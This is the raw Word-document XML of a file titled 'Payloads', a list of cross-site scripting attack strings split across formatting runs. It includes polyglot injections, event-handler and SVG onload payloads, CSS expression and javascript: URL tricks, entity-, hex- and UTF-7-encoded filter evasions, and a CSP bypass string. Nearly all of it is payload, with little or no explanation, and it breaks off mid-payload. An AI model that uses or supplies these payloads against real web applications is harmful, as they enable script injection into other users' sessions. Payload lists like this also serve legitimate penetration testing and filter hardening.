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920A4" w14:textId="632CFDC0" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB2B21E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6E561701" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jaVasCript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/*-/*/`/'/"/**/(/ */</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oNcliCk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=alert() )//%0D%0A%0d%0a//&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stYle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>titLe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teXtarEa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scRipt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/--!&gt;\x3csVg/&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oNloAd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)//&gt;\x3e`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD82FC" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="3C57070A" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/*--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;svg/onload=alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B5F075" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6BD6B2EF" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;&amp;token</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>=;script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'unsafe-inline'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269B7389" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="34AC1A39" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="0036754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proofErr w:type="gramStart"/>
      <w:r>
        <w:t>data:image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/svg+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>xml,%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3Csvg%20onload=alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3E"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4976D32D" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6E903059" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onafterprint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(88,83,83))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9BBFB8" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6E16B335" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onbeforeprint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(88,83,83))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E5EF63" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="4B1DA1F9" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onbeforeunload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(88,83,83))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADBB4C8" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="69B34900" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onhashchange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(88,83,83))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0477DE" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="2C774496" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;IMG SRC=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(88,83,83))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768EE629" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6320B186" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;STYLE&gt;.XSS{background-image:url("</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('XSS')")</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>;}&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78473A9E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="5FA0B08A" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;STYLE type="text/css"&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>BODY{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>background:url("</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('XSS')"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)}&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A182C3" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="79224A81" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;DIV STYLE="background-image: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('XSS'))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339124A2" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="623738BC" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;DIV STYLE="width: expression(alert('XSS'));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8874FC" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="3CFCEEF1" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;STYLE&gt;@im\port'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>\ja\vasc\ript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("XSS")';&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E677615" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="7229D7FF" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(88,83,83))"&gt;Click </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Me!&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A503FB5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="03A8D627" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;a href="&amp;#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>106;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>97;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>118;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>97;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>115;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>99;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>114;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>105;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>112;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>116;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>58;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>97;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>108;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>101;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>114;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>116;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>40;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>39;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>88;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>83;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>83;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>39;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">#41;"&gt;Click </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Me!&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2C5002" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6206659E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;a href="&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29"&gt;Click Me&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A755935" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="363CCDBA" w14:textId="05682954" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>(alert</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723401B3" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="55AD3A33" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> onload="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(1)"&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719EAA5D" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6EFAAAF1" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bgsound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onPropertyChange</w:t>
      </w:r>
      <w:proofErr w:type="spell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(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217CD4D1" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="4CFD13BE" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;applet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onError</w:t>
      </w:r>
      <w:proofErr w:type="spell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(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB343F" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="11400EA9" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;marquee </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onStart</w:t>
      </w:r>
      <w:proofErr w:type="spell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(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F1E98" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="64C585B5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;frameset </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onFocus</w:t>
      </w:r>
      <w:proofErr w:type="spell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(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF389F" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;xml </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onPropertyChange</w:t>
      </w:r>
      <w:proofErr w:type="spell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(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698BF33E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="38FF764E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vmlframe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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>urn:schemas</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-microsoft-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>com:vml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> style=behavior:url(#default#vml</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);position</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>absolute;width</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:100</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>%;height</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">:100% </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=%(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s#xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vmlframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6A4D93" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="782EE5ED" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;math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(1)"&gt;CLICKME&lt;/math&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A37BA05" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="06E834A7" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;event-source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="%(event)s" onload="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15388E30" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="35B37EA9" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;meta charset="x-imap4-modified-utf7"&gt;&amp;ADz&amp;AGn&amp;AG0&amp;AEf&amp;ACA&amp;AHM&amp;AHI&amp;AGO&amp;AD0&amp;AGn&amp;ACA&amp;AG8Abg&amp;AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&amp;ACAAPABi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420EEE37" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="51D57F22" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jaVasCript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/*-/*/`/'/"/**</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/ */</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oNcliCk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert() )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
